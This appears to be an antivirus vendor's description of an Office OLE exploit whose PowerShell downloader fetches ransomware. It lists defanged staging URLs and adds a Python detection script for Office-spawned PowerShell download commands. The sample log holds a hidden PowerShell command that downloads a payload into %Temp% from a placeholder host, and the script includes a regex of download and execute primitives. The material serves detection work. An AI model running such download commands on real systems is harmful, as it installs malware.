Analysis
LNK/Agent.IA!tr.dldr is a generic detection for an Office OLE embedding exploit/PowerShell downloader.
Since this is a generic detection, malware detected as LNK/Agent.IA!tr.dldr may have varying behaviour.
Below are examples of some of its characteristics/behaviours:
- Using an MS Office OLE embedding exploit, this malware intends to issue a PowerShell command that downloads a script from hxxp://ni{Removed}.be/kjh765e46; that script then executes and downloads from the following:
  - hxxp://internet-webs{Removed}.de/O77enbdGF5
  - hxxp://ist-pr{Removed}.ru/O77enbdGF5
  - hxxp://lvps212-67-205-60.vps.webf{Removed}.co.uk/O77enbdGF5
  - hxxp://matternomat{Removed}.com/O77enbdGF5
  - hxxp://m.monteschi{Removed}.com/O77enbdGF5
  - hxxp://minascriptand{Removed}.nl/O77enbdGF5
  - hxxp://hilaryandsa{Removed}.com/O77enbdGF5
  - hxxp://verwadirep{Removed}.info/p66/O77enbdGF5
The downloaded file, located at %Temp%/envbit32.exe, is currently detected as W32/Kryptik.FYKM!tr.ransom.
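The chain described above (an Office host process launching a PowerShell download command that drops a payload under %Temp%) is one that endpoint telemetry can flag. The following added detection example is not from the original page or the vendor; it runs over constructed, tab-separated process-creation records, and the field names, log format, URLs and binary paths are assumptions:

```python
import re
from typing import Dict, List

# Office host processes that have no business launching a download cradle.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Child images to watch.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Download / execute primitives typical of PowerShell downloader commands.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|net\.webclient|invoke-webrequest|\biwr\b|"
    r"start-bitstransfer|invoke-expression|\biex\b|https?://",
    re.IGNORECASE,
)


def parse_line(line: str) -> Dict[str, str]:
    """Parse one constructed, tab-separated key=value record into a dict."""
    parts = line.rstrip("\n").split("\t")
    return dict(p.split("=", 1) for p in parts if "=" in p)


def is_office_download_cradle(ev: Dict[str, str]) -> bool:
    """True when an Office process spawns PowerShell with a download/execute primitive."""
    parent = ev.get("parent", "").lower().rsplit("\\", 1)[-1]
    image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
    cmd = ev.get("cmdline", "")
    return parent in OFFICE_PARENTS and image in SHELL_IMAGES and bool(DOWNLOAD_RE.search(cmd))


def find_alerts(lines: List[str]) -> List[Dict[str, str]]:
    """Return every record matching the Office -> PowerShell downloader pattern."""
    return [ev for ev in map(parse_line, lines) if is_office_download_cradle(ev)]


# Constructed sample telemetry (not from the page); the URL is a placeholder.
SAMPLE_LOG = [
    "ts=2019-01-01T10:00:01\tparent=C:\\Program Files\\Microsoft Office\\WINWORD.EXE\timage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tcmdline=powershell -w hidden -nop (New-Object Net.WebClient).DownloadFile('hxxp://example.invalid/x','%Temp%\\envbit32.exe')",
    "ts=2019-01-01T10:00:02\tparent=C:\\Windows\\explorer.exe\timage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tcmdline=powershell Get-Process",
    "ts=2019-01-01T10:00:03\tparent=C:\\Program Files\\Microsoft Office\\WINWORD.EXE\timage=C:\\Windows\\splwow64.exe\tcmdline=splwow64.exe 12288",
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print("ALERT:", alert["parent"], "->", alert["image"], "|", alert["cmdline"])
```

Only the first record fires: a benign PowerShell launched from Explorer and a non-shell child of Word both pass, so the rule keys on the parent/child pair plus the download primitive rather than on any one of them.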
Below is an example of an infected document:
- Figure 1: Infected Document.